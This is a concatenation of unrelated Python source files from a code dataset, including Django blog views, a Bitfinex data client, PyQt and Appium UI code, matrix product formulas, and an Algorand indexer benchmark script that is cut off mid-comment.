# if (arr[i] < initial_buy and arr.index(arr[i]) < arr.index(initial_sell)):
# initial_buy = arr[i]
# # print('initial_sell', initial_sell)
# # print('initial_buy', initial_buy)
# return initial_sell - initial_buy
# Optimized solution with O(n) time complexity
'''Pseudocode: Just 1 for loop
1. Set variable called min_price to the first array elment
2. Set variable called max_profit to the the 1st array element minus 2nd array element.
3. Make for loop, starting at index 0 all the way to last element.
4. Inside for loop, update max_profit value using max method by comparing initial max_profit value vs. the current price at current element minus
min_price value from initial 1st array element.
5. Still inside for loop, update the min_price variable using min method comparing initial min_price from 1st array element vs. current array
element at current index.
6. Return max_profit.
'''
def stock_prices(arr):
min_price = arr[0]
max_profit = arr[1] - arr[0]
for i in range(1, len(arr)):
max_profit = max(arr[i] - min_price, max_profit)
min_price = min(min_price, arr[i])
return max_profit
print(stock_prices([10, 7, 5, 8, 11, 9])) # 6
print(stock_prices([100, 90, 80, 50, 20, 10])) # -10
print(stock_prices([1050, 270, 1540, 3800, 2])) # 3530
print(stock_prices([100, 55, 4, 98, 10, 18, 90, 95, 43, 11, 47, 67, 89, 42, 49, 79])) # 94
| StarcoderdataPython |
3299403 | <reponame>rafaelapcruz/Awesome_Python_Scripts
import re
def vowel_remover(string):
new_str = re.findall("[^aeiouAEIOU]+", string)
for txt in (new_str):
print(txt, end = '')
input_text = input('Enter input text: ')
vowel_remover(input_text) | StarcoderdataPython |
3297424 | <filename>blog/views.py
from django.shortcuts import render, redirect
from django import forms
from django.conf import settings
from django.core.mail import send_mail
from django_journal_project.settings import EMAIL_ADDRESS, EMAIL_PASSWORD
from .models import Post
import os
from django.core.mail import EmailMessage
# from .models import Tag
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.views.generic import ListView, TemplateView, DetailView, CreateView, UpdateView, DeleteView
from django.urls import reverse
from django.contrib import messages
from django.core.mail import BadHeaderError
from django.http import HttpResponse, HttpResponseRedirect
from .forms import ContactForm
from django.contrib import messages
import smtplib
from smtplib import *
def home(request):
context = {
'posts': Post.objects.all(),
}
return render(request, "blog/home.html", context)
def about(request):
return render(request, "blog/about.html")
def contactView(request):
if request.method == 'GET':
form = ContactForm()
else:
form = ContactForm(request.POST)
if form.is_valid():
subject = form.cleaned_data['subject']
from_email = form.cleaned_data['from_email']
message = form.cleaned_data['message']
try:
send_mail(subject+" from: "+from_email, message, from_email,[settings.EMAIL_HOST_USER])
messages.success(request, "Thank you for contacting us. Your email has been sent.")
return redirect('site-help')
except SMTPResponseException as e:
return HttpResponse('Email contact is not functional currently. Apologies.')
except BadHeaderError:
return HttpResponse('Invalid header found.')
return render(request, "blog/help.html", {'form': form})
def successView(request):
return HttpResponse('Success! Thank you for your message.')
def explore(request):
return render(request, "blog/explore.html")
def SearchResults(request):
if request.method == "GET":
searched = request.GET.get('searched')
#take away capitalizations and search lowercase versions as well with lower() method
searchedL=searched.lower()
context = {'searched': searched, 'post_results': []}
all_posts = Post.objects.all()
for post in all_posts:
found=False
list_of_words_in_title = post.title.lower().split() #splits words in title into list
for word in list_of_words_in_title:
if word==searchedL:
found=True
if found==False:
list_of_words_in_content = post.post_content.lower().split()
for word in list_of_words_in_content:
if word==searchedL:
found=True
if found==False:
author = post.author.username
if author==searched:
found=True
if found:
context['post_results'].append(post)
return render(request, "blog/search_results.html", context)
else:
return render(request, "blog/search_results.html", {})
# class MultipleModelView(TemplateView):
# template_name = 'blog/home.html'
# def get_context_data(self, **kwargs):
# context = super(MultipleModelView, self).get_context_data(**kwargs)
# context['posts'] = Post.objects.all().order_by('-date_posted')
# context['tags'] = Tag.objects.all()
# return context
class PostListView(ListView):
#MultipleModelsListView(ListView) - add in Tag, look up context object name multiple too,
#feed into home.html
model = Post
template_name = 'blog/home.html'
context_object_name = 'posts'
ordering = ['-date_posted']
class PostUserListView(ListView):
model = Post
def get_queryset(self):
posts = Post.objects.all()
for post in posts:
if post.author.username==self.kwargs['username']:
pk_value=post.author.id
break
queryset = Post.objects.all().filter(author=pk_value)
queryset=queryset.order_by('-date_posted')
return queryset
template_name = 'blog/user_blog.html'
class PostDetailView(DetailView):
model = Post
template_name = 'blog/post_detail.html'
# def get_context_data(self, **kwargs):
# context = super(PostDetailView, self).get_context_data(**kwargs)
# context['posts'] = Post.objects.all().order_by('-date_posted')
# context['tags'] = Tag.objects.all()
# return context
class PostCreateView(LoginRequiredMixin, CreateView):
model = Post
fields = ['title', 'post_content']
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Post
fields = ['title', 'post_content']
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
def test_func(self):
post=self.get_object()
if self.request.user == post.author:
return True
return False
class PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Post
fields = ['title', 'post_content']
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
def test_func(self):
post=self.get_object()
if self.request.user == post.author:
return True
return False
class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Post
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
def test_func(self):
post=self.get_object()
if self.request.user == post.author:
return True
return False
def get_success_url(self):
messages.add_message(self.request, messages.INFO, 'Post deleted.')
return reverse('profile')
| StarcoderdataPython |
1786025 | <reponame>assassinen/coursera_mfti_python<filename>bitfinex/api/data.py
import time
import requests as requests
from configparser import ConfigParser
class Ticker:
def __init__(self):
config = ConfigParser()
config.read_file(open('config.ini'))
self.url = config['ticker']['url']
self.key = config['ticker']['responce_key'].split(',\n')
def get_tiker(self, symbol):
result = []
try:
response = requests.get(self.url.format(','.join(symbol)))
if response.status_code == 200:
result = dict(zip(self.key, response.json()))
except:
return result
return result
def get_last_price(self, symbol='tBTCUSD'):
symbol = symbol if isinstance(symbol, tuple) else (symbol,)
result = self.get_tiker(symbol)
while 'LAST_PRICE' not in result:
result = self.get_tiker(symbol)
self.last_price = result['LAST_PRICE']
return self.last_price
class Candles:
def __init__(self):
config = ConfigParser()
config.read_file(open('config.ini'))
self.url = config['candles']['url']
self.key = config['candles']['responce_key'].split(',\n')
self.limit = 1000
def time_to_unix_time(self, human_time):
return int(time.mktime(time.strptime(human_time, '%Y-%m-%d %H:%M:%S')))
def unix_time_to_time(self, unix_time):
return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.localtime(unix_time))
def get_duration_candle(self, time_frame):
multiplier = {'m': 60, 'h': 3600, 'D': 86400}
return int(time_frame[0:-1]) * multiplier[time_frame[-1]]
def get_candle(self, symbol, limit, time_frame, start, end):
request = self.url.format(limit=limit, time_frame=time_frame, symbol=symbol, start=start*1000, end=end*1000)
try:
response = requests.get(request)
if response.status_code == 200:
result = [dict(zip(self.key, item)) for item in response.json()]
return result if len(result) > 0 else ['no fing data']
elif 'error' in response.json():
return False
except:
return False
def get_candles(self, symbol, time_frame, start, end):
duration = self.get_duration_candle(time_frame) * self.limit
start = self.time_to_unix_time(start)
end = self.time_to_unix_time(end)
while start <= end:
calc_end = start + duration - 1
calc_end = end + 1 if end <= calc_end else calc_end
candles = self.get_candle(symbol=symbol, limit=self.limit, time_frame=time_frame, start=start, end=calc_end)
while not candles:
candles = self.get_candle(symbol=symbol, limit=self.limit, time_frame=time_frame, start=start, end=calc_end)
time.sleep(2)
for candle in candles:
yield candle
start += duration
def put_order(**kwargs):
return True
| StarcoderdataPython |
3359849 | """Fixtures for websocket tests."""
import pytest
from homeassistant.setup import async_setup_component
from homeassistant.components.websocket_api.http import URL
from homeassistant.components.websocket_api.auth import TYPE_AUTH_REQUIRED
from . import API_PASSWORD
@pytest.fixture
def websocket_client(hass, hass_ws_client):
"""Create a websocket client."""
return hass.loop.run_until_complete(hass_ws_client(hass))
@pytest.fixture
def no_auth_websocket_client(hass, loop, aiohttp_client):
"""Websocket connection that requires authentication."""
assert loop.run_until_complete(
async_setup_component(hass, 'websocket_api', {
'http': {
'api_password': API_PASSWORD
}
}))
client = loop.run_until_complete(aiohttp_client(hass.http.app))
ws = loop.run_until_complete(client.ws_connect(URL))
auth_ok = loop.run_until_complete(ws.receive_json())
assert auth_ok['type'] == TYPE_AUTH_REQUIRED
yield ws
if not ws.closed:
loop.run_until_complete(ws.close())
| StarcoderdataPython |
3332347 | def function_1():
function_2()
function_3()
return
def function_2():
function_3()
function_1()
return
def function_3():
return
# def function_4():
# function_5()
# return
# def function_5():
# function_6()
# function_7()
# return
# def function_6():
# function_5()
# function_7()
# return
# def function_7():
# return
class class1:
def __init__(self):
self.a = 1
def method_1():
function_1()
def main():
class_instance = class1()
# class1.class2.class3.method_1()
class1.method_1()
for i in range(2):
a = 1
| StarcoderdataPython |
1683835 | # -*- coding: utf-8 -*-
# This space deliberately left almost blank.
| StarcoderdataPython |
3364661 | <filename>book/src/ch05/src/decorator_parametrized_1.py
"""Clean Code in Python - Chapter 5: Decorators
Parametrized decorators using functions
"""
from functools import wraps
from typing import Sequence, Optional
from decorator_function_1 import ControlledException
from log import logger
_DEFAULT_RETRIES_LIMIT = 3
def with_retry(
retries_limit: int = _DEFAULT_RETRIES_LIMIT,
allowed_exceptions: Optional[Sequence[Exception]] = None,
):
allowed_exceptions = allowed_exceptions or (ControlledException,) # type: ignore
def retry(operation):
@wraps(operation)
def wrapped(*args, **kwargs):
last_raised = None
for _ in range(retries_limit):
try:
return operation(*args, **kwargs)
except allowed_exceptions as e:
logger.warning(
"retrying %s due to %s", operation.__qualname__, e
)
last_raised = e
raise last_raised
return wrapped
return retry
| StarcoderdataPython |
4803549 | <filename>my_page.py
from time import sleep
from selenium.webdriver.common.by import By
from constant import back
def my_page_testing(driver):
driver.find_element(By.XPATH,
"/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.RelativeLayout[3]").click()
sleep(1)
print("========my page testing started========")
print("testing the cloud...")
# 获取云空间
driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_cloud_space").click()
driver.find_element(By.ID, "com.iflytek.zhiying:id/iv_help").click()
sleep(5)
back(driver)
driver.find_element(By.ID, "com.iflytek.zhiying:id/iv_cloud_list").click()
sleep(5)
back(driver)
back(driver)
print("cloud testing done!")
print("now test the recycle bin...")
driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_recycle_bin").click()
driver.find_element(By.XPATH,
"/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.RelativeLayout/android.view.ViewGroup/android.widget.RelativeLayout[2]/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[1]/android.widget.LinearLayout[2]/android.widget.ImageView").click()
print("deleting the file")
driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_pop_delete").click()
driver.find_element(By.ID, "com.iflytek.zhiying:id/btn_selectPositive").click()
back(driver)
print("deleted!")
print("testing other entries...")
driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_account_setting").click()
back(driver)
print("setting done!")
driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_product_use_guidance").click()
sleep(2)
back(driver)
print("guide done!")
driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_feedback").click()
sleep(2)
back(driver)
print("feedback done!")
el12 = driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_about")
el12.click()
el13 = driver.find_element(By.ID, "com.iflytek.zhiying:id/tv_version_update")
el13.click()
back(driver)
back(driver)
print("about done!")
print("========my page done!========")
driver.find_element(By.XPATH,
"/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.RelativeLayout[1]").click()
| StarcoderdataPython |
1797129 | <gh_stars>0
from ovim.log import logger
from urllib import request
import json
import tarfile
import tempfile
import os
class UbuntuRunner:
homedir = os.path.abspath(os.getenv('HOME'))
local_bin = os.path.join(homedir, '.local', 'bin')
@classmethod
def check_env(cls):
if os.system("curl --version"):
raise RuntimeError('curl is not exist.')
@classmethod
def install_fzf(cls):
with os.popen("uname -sm") as f:
arch = f.read()
arch = arch.strip()
logger.info(arch)
if arch.endswith("64"):
arch = "linux_amd64"
elif "armv5" in arch:
arch = "linux_armv5"
elif "armv6" in arch:
arch = "linux_armv6"
elif "armv7" in arch:
arch = "linux_amdv7"
elif "armv8" in arch:
arch = "linux_amd64"
elif "aarch64" in arch:
arch = "linux_amd64"
fzf_release_url = "https://api.github.com/repos/junegunn/fzf/releases/latest"
resp = request.urlopen(fzf_release_url)
j = resp.read().decode()
j = json.loads(j)
latest_tag_name = j['tag_name']
file_url = "https://github.com/junegunn/fzf/releases/download/{}/fzf-{}-{}.tar.gz".format(
latest_tag_name, latest_tag_name, arch)
logger.info("download fzf...")
resp = request.urlopen(file_url)
temp_file = tempfile.TemporaryFile()
temp_file.write(resp.read())
resp.close()
temp_file.seek(0)
tfile = tarfile.open(fileobj=temp_file, mode='r')
os.makedirs(cls.local_bin, exist_ok=True)
tfile.extract('fzf', cls.local_bin)
logger.info("fzf extract to {}".format(cls.local_bin))
tfile.close()
temp_file.close()
@classmethod
def install_ctags(cls):
with os.popen("apt list --installed universal-ctags") as f:
r = f.read()
logger.info(r)
if "universal-ctags" not in r:
os.system("apt-get install universal-ctags -y")
@classmethod
def run(cls):
try:
logger.info("ubuntu runner start.")
cls.install_ctags()
cls.install_fzf()
except Exception as e:
logger.error("UbuntuRunner occured error {}".format(e))
| StarcoderdataPython |
3302972 | """
RDB 2015
User Interface
Filtering Widget
Author: <NAME>
"""
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import (QWidget, QHBoxLayout, QPushButton, QLabel,
QDialog)
from copy import deepcopy
from datetime import timezone
from .filterdialog import FilterDialog
class FilteringWidget(QWidget):
filterChanged = pyqtSignal(dict)
@staticmethod
def filterToText(filter_):
def appendText(original, additional):
if not original:
return additional
return original + ', ' + additional
if not filter_:
return "(žádný)"
text = ""
if 'block' in filter_:
text = appendText(text, 'Skupina měření: %s' % filter_['block'])
if 'device' in filter_:
text = appendText(text, 'Přístroj: %s' % filter_['device'])
if 'unit' in filter_:
text = appendText(text, 'Jednotka: %s' % filter_['unit'])
if 'start_datetime' in filter_:
text = appendText(text, 'Od: %s' % \
utc_to_local(filter_['start_datetime']).
strftime('%Y-%m-%d %H:%M:%S'))
if 'end_datetime' in filter_:
text = appendText(text, 'Do: %s' % \
utc_to_local(filter_['end_datetime']).
strftime('%Y-%m-%d %H:%M:%S'))
if 'loc_x' in filter_:
try:
text = appendText(text, 'Lokace: (%s, %s, +-%s)' %
(filter_['loc_x'], filter_['loc_y'], filter_['loc_tol']))
except KeyError:
pass
if 'deviated_values' in filter_ and \
filter_['deviated_values'] == True:
text = appendText(text, 'Mimo odchylku')
return text
def __init__(self, parent=None):
super(FilteringWidget, self).__init__(parent)
self._filter = {}
self.label = QLabel(self)
self.label.setWordWrap(True)
self.label.setText(self.filterToText(self._filter))
self.changeFilter = QPushButton(self)
self.changeFilter.setText("Upravit filtr")
self.changeFilter.clicked.connect(self.on_changeFilter_clicked)
self.removeFilter = QPushButton(self)
self.removeFilter.setText("Smazat filtr")
self.removeFilter.clicked.connect(self.on_removeFilter_clicked)
layout = QHBoxLayout()
layout.addWidget(QLabel("Aktivní filtr: "))
layout.addWidget(self.label)
layout.setStretch(1, 1)
layout.addWidget(self.changeFilter)
layout.addWidget(self.removeFilter)
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
self.setMinimumHeight(60)
@pyqtSlot()
def on_changeFilter_clicked(self):
filterDialog = FilterDialog()
filterDialog.initControls(self.options, self._filter)
if filterDialog.exec_() == QDialog.Accepted:
self.setFilter(filterDialog.filter())
@pyqtSlot()
def on_removeFilter_clicked(self):
self.setFilter({})
def setFilter(self, filter_):
self._filter = filter_
self.onFilterChange()
def setOptions(self, options):
self.options = options
def onFilterChange(self):
self.label.setText(self.filterToText(self._filter))
self.filterChanged.emit(self._filter)
def filter(self):
return self._filter
def utc_to_local(utc_dt):
return utc_dt.replace(tzinfo=timezone.utc).astimezone(tz=None)
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
from datetime import datetime
app = QApplication(sys.argv)
options = {'block': [1, 2, 3, 4, 5], \
'device': ['rm2-x', 'zc-3d', 'qap'], \
'unit': ['Hz', 'A', 'm^2']}
filter_ = {'block': 4, 'unit': 'Hz', 'deviated_values': True, \
'start_datetime': datetime(2015,5,7,10)}
widget = FilteringWidget()
widget.setOptions(options)
widget.setFilter(filter_)
widget.show()
sys.exit(app.exec_())
| StarcoderdataPython |
1601740 | # thread class for updating tweets in the background
import time
import threading
class TweetUpdateThread(threading.Thread):
''' thread class to fetch tweets in the background '''
def __init__(self, cli_object, function, waittime):
''' At initialization some local variables are set:
waittime = the time to wait between tweet fetches
cli = the cli object from which the update cmd is called
function = the update function to call from the cli object
endme = boolean value to determine whether to stop the thread
counter = counting the sleeps until the next update
'''
threading.Thread.__init__(self)
self.waittime = waittime
self.cli = cli_object
self.function = function
self.endme = False
self.counter = 0
def stop(self):
''' stop the thread '''
threading.Thread.__stop(self)
def run(self):
''' The thread is run here until the endme variable is set
to true. While running the thread executes the passed
cli function in intervals of waittime. Time may differ if
this thread is run a long time because of command execution
delays. Has to be tested. The construct with checking the
endme variable every second secures that the user doesn't
have to wait another waittime interval (worst case) until
the thread is ended
'''
while self.endme == False:
if self.counter == self.waittime:
self.counter = 0
self.cli.do_hello("")
else:
self.counter = self.counter + 1
time.sleep(1)
def setend(self):
''' Interface to set the end of the thread '''
self.endme = True | StarcoderdataPython |
1777633 | from abc import ABC, abstractmethod
from typing import List
from mpmath import eye, mpc, matrix
from mpmath import expm as mp_expm
from numpy import ndarray, identity
from numpy.linalg import matrix_power
from scipy.linalg import expm as scipy_expm
from .matrices import Matrix
class ProductFormula(ABC):
@abstractmethod
def __call__(self, time: float, matrices: List[Matrix]) -> Matrix:
"""Return an approximation of e^{-i * sum(matrices) * time}."""
...
@abstractmethod
def set_steps(self, steps: int) -> None:
"""Set the number of steps used"""
...
def _ensure_dimensions(self, matrices: List[Matrix]) -> None:
"""Make sure that matrices are square and have the same dimensions."""
if isinstance(matrices[0], matrix):
rows, cols = matrices[0].rows, matrices[0].cols
assert all(A.rows == rows and A.cols == cols for A in matrices), (
"Matrices must be of the same dimension")
elif isinstance(matrices[0], ndarray):
rows, cols = matrices[0].shape
assert all(A.shape == (rows, cols) for A in matrices), (
"Matrices must be of the same dimension")
else:
raise TypeError("Unknown matrix type: {type(matrices[0])}. "
"Need mp.matrix or np.ndarray.")
def _eye(self, matrices: List[Matrix]) -> Matrix:
"""Return the identity matrix matching the matrices.
In the sense that
>>> matrices[0] @ self._eye(matrices) == matrices[0]
True
(So the type and dimension match)
Works for square mp.matrix and 2D square np.ndarray.
"""
if isinstance(matrices[0], matrix):
rows, cols = matrices[0].rows, matrices[0].cols
return eye(rows)
elif isinstance(matrices[0], ndarray):
rows, cols = matrices[0].shape
return identity(rows)
else:
raise TypeError("Unknown matrix type: {type(matrices[0])}. "
"Need mp.matrix or np.ndarray.")
def _expm(self, s: complex, M: Matrix) -> Matrix:
"""Compute e^(s*M) with the appropriate method
Either scipy.linalg.expm or mp.expm, depending on
the type of M.
"""
if isinstance(M, ndarray):
return scipy_expm(complex(s) * M)
elif isinstance(M, matrix):
# use same method as scipy.linalg.expm
return mp_expm(s * M, method='pade')
else:
raise TypeError("Unknown matrix type: {type(matrices[0])}. "
"Need mp.matrix or np.ndarray.")
def _matpow(self, M: matrix, s: int) -> Matrix:
"""Compute M**s with the type-appropriate method"""
if isinstance(M, ndarray):
return matrix_power(M, s)
elif isinstance(M, matrix):
# use same method as scipy.linalg.expm
return M**s
else:
raise TypeError("Unknown matrix type: {type(matrices[0])}. "
"Need mp.matrix or np.ndarray.")
@abstractmethod
def __str__(self) -> str:
...
class TrotterFirstOrder(ProductFormula):
r"""Approximate e^{-i \sum H_j t} to first order.
Computes e^{-i \sum H_j t} as (\prod_{j=1}^J e^{-i H_j t/m})^m.
"""
def __init__(self, steps: int = 0) -> None:
"""
Parameters
----------
steps: int
Number of timesteps taken (m).
"""
self.m = steps
def set_steps(self, steps: int) -> None:
"""
Parameters
----------
steps: int
Number of timesteps taken (m).
"""
self.m = steps
def __call__(self, time: float, matrices: List[Matrix]) -> Matrix:
r"""Approximate e^{-i * sum(matrices) * time} to first order.
No optimization for len(matrices) == 2 (symmetric Strang splitting).
"""
self._ensure_dimensions(matrices)
result = self._eye(matrices)
if self.m == 0:
return result
t_prime = mpc(time) / self.m
for H in matrices:
result = result @ self._expm(-1j * t_prime, H)
return self._matpow(result, self.m)
def __str__(self) -> str:
return "T1"
class TrotterSecondOrder(ProductFormula):
r"""Approximate e^{-i \sum H_j t} to second order.
Computes e^{-i \sum H_j t} as
((\prod_{j=1}^J e^{-i H_j t/2m})(\prod_{j=J}^1 e^{-i H_j t/2m}))^m.
"""
def __init__(self, steps: int = 0) -> None:
"""
Parameters
----------
steps: int
Number of timesteps taken (m).
"""
self.m = steps
def set_steps(self, steps: int) -> None:
"""
Parameters
----------
steps: int
Number of timesteps taken (m).
"""
self.m = steps
def __call__(self, time: float, matrices: List[Matrix]) -> Matrix:
r"""Approximate e^{-i * sum(matrices) * time} to second order.
No optimization for len(matrices) == 2 (symmetric Strang splitting).
"""
self._ensure_dimensions(matrices)
result = self._eye(matrices)
if self.m == 0:
return result
if len(matrices) == 1:
return self._expm(-1j * time * matrices[0])
t_prime = mpc(time) / (2 * self.m)
result = result @ self._expm(-2j * t_prime, matrices[0])
for H in matrices[1:-1]:
result = result @ self._expm(-1j * t_prime, H)
result = result @ self._expm(-2j * t_prime, matrices[-1])
for H in reversed(matrices[1:-1]):
result = result @ self._expm(-1j * t_prime, H)
return (self._expm(1j * t_prime, matrices[0]) @
self._matpow(result, self.m) @
self._expm(-1j * t_prime, matrices[0]))
def __str__(self) -> str:
return "T2"
class ExactMatrixExponential(ProductFormula):
r"""Compute e^{-i \sum H_j t} exactly"""
def __init__(self) -> None:
pass
def set_steps(self, steps: int = 0) -> None:
"""Exact exponentiation doesn't use steps, arguments are ignored"""
pass
def __call__(self, time: float, matrices: List[Matrix]) -> Matrix:
r"""Compute e^{-i * sum(matrices) * time} exactly by summing up matrices.
"""
self._ensure_dimensions(matrices)
return self._expm(-1j * time, sum(matrices))
def __str__(self) -> str:
return "EX"
| StarcoderdataPython |
1708556 | <reponame>Arko98/Alogirthms
# Problem: https://leetcode.com/problems/k-diff-pairs-in-an-array/
class Solution:
def findPairs(self, nums: List[int], k: int) -> int:
ans = []
for i in range(len(nums)):
if nums[i]+k in nums[i+1:]:
print('yes')
tuple_obj = None
if nums[i] <= nums[i]+k:
tuple_obj = (nums[i],nums[i]+k)
else:
tuple_obj = (nums[i]+k, nums[i])
ans.append(tuple_obj)
if nums[i]-k in nums[i+1:]:
print('yes')
tuple_obj = None
if nums[i] <= nums[i]-k:
tuple_obj = (nums[i],nums[i]-k)
else:
tuple_obj = (nums[i]-k, nums[i])
ans.append(tuple_obj)
print(set(ans))
return len(set(ans))
| StarcoderdataPython |
3353788 | #!/usr/bin/env python3
import base64
import json
import logging
import os
import random
import sqlite3
import sys
import time
import urllib.error
import urllib.request
import urllib.parse
logger = logging.getLogger(__name__)
_localhost_rooturl = 'http://localhost:8980'
# getAccountsPage(pageurl string, accounts set())
# return nextToken or None
def getAccountsPage(pageurl, accounts):
try:
logger.debug('GET %r', pageurl)
response = urllib.request.urlopen(pageurl)
except urllib.error.HTTPError as e:
logger.error('failed to fetch %r', pageurl)
logger.error('msg: %s', e.file.read())
raise
except Exception as e:
logger.error('%r', pageurl, exc_info=True)
raise
if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
ob = json.loads(response.read())
qa = ob.get('accounts',[])
if not qa:
return None
for acct in qa:
accounts.add(acct['address'])
return ob.get('next-token')
# /v2/acccounts
def getAccountList(rooturl):
rootparts = urllib.parse.urlparse(rooturl)
rawurl = list(rootparts)
accountsurl = list(rootparts)
accountsurl[2] = os.path.join(rawurl[2], 'v2', 'accounts')
query = {}
accounts = set()
start = time.time()
nextToken = None
reporturl = None
while True:
if nextToken is not None:
query['next'] = nextToken
if query:
accountsurl[4] = urllib.parse.urlencode(query)
pageurl = urllib.parse.urlunparse(accountsurl)
if reporturl is None:
reporturl = pageurl
nextToken = getAccountsPage(pageurl, accounts)
if nextToken is None:
break
dt = time.time() - start
logger.info('account list: %d accounts in %0.2f seconds, %.1f /s', len(accounts), dt, len(accounts)/dt)
return accounts, {'url':reporturl, 'accounts': len(accounts), 'seconds': dt}
# /v2/accounts/AAAAA
# TODO: multithreading, because a single client won't find the limit of the server
def accountRandom(rooturl, accounts, n=1000, minTime=None, maxTime=30):
rootparts = urllib.parse.urlparse(rooturl)
rawurl = list(rootparts)
accountsurl = list(rootparts)
accounts = list(accounts)
random.shuffle(accounts)
count = 0
start = time.time()
reporturl = None
for addr in accounts:
accountsurl[2] = os.path.join(rawurl[2], 'v2', 'accounts', addr)
pageurl = urllib.parse.urlunparse(accountsurl)
if reporturl is None:
reporturl = pageurl
logger.debug('GET %s', pageurl)
response = urllib.request.urlopen(pageurl)
if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
# don't actually care about content, just check that it parses
json.loads(response.read())
count += 1
dt = time.time() - start
if (n and (count >= n)) and (not minTime or (dt > minTime)):
break
if not n and minTime and (dt > minTime):
break
if maxTime and (dt > maxTime):
break
logger.info('account random: %d accounts in %0.2f seconds, %.1f /s', count, dt, count/dt)
return {'url':reporturl, 'accounts': count, 'seconds': dt}
# /v2/transactions?addr=
# equivalent to
# /v2/accounts/AAAA/transactions
def accountRecents(rooturl, accounts, n=1000, minTime=None, maxTime=10, ntxns=1000):
rootparts = urllib.parse.urlparse(rooturl)
rawurl = list(rootparts)
atxnsurl = list(rootparts)
accounts = list(accounts)
random.shuffle(accounts)
count = 0
txcount = 0
start = time.time()
reporturl = None
for addr in accounts:
atxnsurl[2] = os.path.join(rawurl[2], 'v2', 'transactions')
query = {'limit':ntxns, 'address':addr}
atxnsurl[4] = urllib.parse.urlencode(query)
pageurl = urllib.parse.urlunparse(atxnsurl)
if reporturl is None:
reporturl = pageurl
logger.debug('GET %s', pageurl)
response = urllib.request.urlopen(pageurl)
if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
ob = json.loads(response.read())
txns = ob.get('transactions', [])
txcount += len(txns)
count += 1
dt = time.time() - start
if (n and (count >= n)) and (not minTime or (dt > minTime)):
break
if not n and minTime and (dt > minTime):
break
if maxTime and (dt > maxTime):
break
logger.info('account recent txns: %d accounts in %0.2f seconds, %.1f /s; %d txns, %.1f txn/s', count, dt, count/dt, txcount, txcount/dt)
return {'url':reporturl, 'accounts': count, 'seconds': dt, 'txns': txcount}
# /v2/assets
def getAssets(rooturl):
rootparts = urllib.parse.urlparse(rooturl)
rawurl = list(rootparts)
accountsurl = list(rootparts)
accountsurl[2] = os.path.join(rawurl[2], 'v2', 'assets')
query = {}
assets = {}
start = time.time()
nextToken = None
reporturl = None
while True:
if nextToken is not None:
query['next'] = nextToken
if query:
accountsurl[4] = urllib.parse.urlencode(query)
pageurl = urllib.parse.urlunparse(accountsurl)
if reporturl is None:
reporturl = pageurl
logger.debug('GET %s', pageurl)
response = urllib.request.urlopen(pageurl)
if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
page = json.loads(response.read())
for arec in page.get('assets', []):
assets[arec['index']] = arec['params']
nextToken = page.get('next-token')
if nextToken is None:
break
dt = time.time() - start
logger.info('asset list: %d assets in %0.2f seconds, %.1f /s', len(assets), dt, len(assets)/dt)
return assets, {'url':reporturl, 'assets': len(assets), 'seconds': dt}
# /v2/assets/{asset-id}/transactions
# equivalent to
# /v2/transactions?asset-id=N
#
# To make fast:
# CREATE INDEX CONCURRENTLY IF NOT EXISTS txn_asset ON txn (asset, round, intra);
def assetTxns(rooturl, assets, n=1000, minTime=None, maxTime=10, ntxns=1000):
rootparts = urllib.parse.urlparse(rooturl)
rawurl = list(rootparts)
atxnsurl = list(rootparts)
assets = list(assets.keys())
random.shuffle(assets)
count = 0
txcount = 0
start = time.time()
reporturl = None
for assetid in assets:
atxnsurl[2] = os.path.join(rawurl[2], 'v2', 'assets', str(assetid), 'transactions')
query = {'limit':ntxns}
atxnsurl[4] = urllib.parse.urlencode(query)
pageurl = urllib.parse.urlunparse(atxnsurl)
if reporturl is None:
reporturl = pageurl
logger.debug('GET %s', pageurl)
response = urllib.request.urlopen(pageurl)
if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
ob = json.loads(response.read())
txns = ob.get('transactions', [])
txcount += len(txns)
count += 1
dt = time.time() - start
if (n and (count >= n)) and (not minTime or (dt > minTime)):
break
if not n and minTime and (dt > minTime):
break
if maxTime and (dt > maxTime):
break
logger.info('asset txns: %d assets in %0.2f seconds, %.1f /s; %d txns, %.1f txn/s', count, dt, count/dt, txcount, txcount/dt)
return {'url':reporturl, 'assets': count, 'seconds': dt, 'txns': txcount}
# /v2/assets/{asset-id}/balances -- maybe add index to account_asset table?
#
# To make fast:
